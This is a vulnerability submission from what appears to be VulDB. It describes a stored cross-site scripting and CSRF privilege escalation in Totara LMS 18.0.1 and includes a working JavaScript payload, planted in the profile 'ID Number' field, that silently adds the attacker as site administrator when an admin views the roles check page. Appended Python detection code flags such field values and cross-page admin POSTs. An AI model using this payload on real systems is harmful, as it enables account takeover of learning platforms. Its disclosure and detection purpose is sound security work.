Submission #314381: Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalation
Info

Title: Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalation

Description:
# Exploit Title: CSRF Privileges Scalation Totara 18.0.1
# Date: 2024-04-10
# Author: Patricio Alejandro Moraga Abarca (RREEDD) and Juan Carlos Garcés Bernt (DeBobiPro)
# Category: webapps
# Tested on: Totara 18.0.1 (Build: 20231128.01)

# Proof Of Concept:
1. In your user profile modify the "ID Number" variable by entering the payload.
2. The payload will be executed by the administrator when visiting the site "admin/roles/check.php", making the profile defined in the administrator payload.

# Payload
<script>
const http = new XMLHttpRequest();
http.open("POST", "/admin/roles/admins.php", false);
http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
http.send("confirmadd=<USER ID>&sesskey="+M.cfg.sesskey);
</script>

# The <USER ID> field must be modified by the value of your user.
# The variable "sesskey" is unique to each login, so we get it dynamically with the call to the object "M.cfg.sesskey".
User: Anonymous User
Submit: 2024-04-10 07:35 PM (2 years ago)
Moderation: 2024-04-17 06:58 PM (7 days later)
Status: Accepted
VulDB Entry: 261369 [Totara LMS up to 18.7 User Selector cross-site request forgery]
Points: 17
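
A defender-side check for the behaviour this submission describes, as an added example that is not part of the submission or of Totara's code: it flags "ID Number" profile values that carry markup, and POSTs to /admin/roles/admins.php whose Referer is some other page. The sample users, log lines and host name are constructed, and the Referer rule assumes that a legitimate site-administrator assignment is submitted from admins.php itself.

```python
import re
from urllib.parse import urlsplit

# Constructed sample data: (user id, "ID Number" profile field).
USERS = [
    (2, "EMP-00017"),
    (41, "A-2291/B"),
    (57, '<script>http.open("POST", "/admin/roles/admins.php")</script>'),
    (63, "&lt;img src=x&gt;"),
]

# Constructed access-log lines in combined log format.
LOG = [
    '203.0.113.7 - - [10/Apr/2024:19:40:02 +0000] "POST /admin/roles/admins.php '
    'HTTP/1.1" 200 5120 "https://lms.example/admin/roles/admins.php" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Apr/2024:19:52:10 +0000] "GET /admin/roles/check.php'
    '?contextid=1 HTTP/1.1" 200 8801 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Apr/2024:19:52:11 +0000] "POST /admin/roles/admins.php '
    'HTTP/1.1" 303 0 "https://lms.example/admin/roles/check.php?contextid=1" '
    '"Mozilla/5.0"',
]

ADMIN_PATH = "/admin/roles/admins.php"
# Raw or entity-encoded angle brackets have no place in an ID number.
MARKUP = re.compile(r"[<>]|&(?:lt|gt|#\d+|#x[0-9a-f]+);|javascript:", re.I)
LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                  r'\d{3} \S+ "(?P<referer>[^"]*)"')


def suspicious_idnumbers(users):
    """Return ids of users whose ID Number contains markup or encoded markup."""
    return [uid for uid, idnumber in users if MARKUP.search(idnumber)]


def cross_page_admin_posts(lines):
    """Return POSTs to the admin-assignment page sent from a different page."""
    hits = []
    for line in lines:
        m = LINE.search(line)
        if not m or m["method"] != "POST":
            continue
        if urlsplit(m["path"]).path != ADMIN_PATH:
            continue
        # Assumption: the legitimate form posts back to its own URL.
        if urlsplit(m["referer"]).path != ADMIN_PATH:
            hits.append(line)
    return hits
```

A hit from either function is a lead to review against the current list of site administrators, not proof of compromise.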
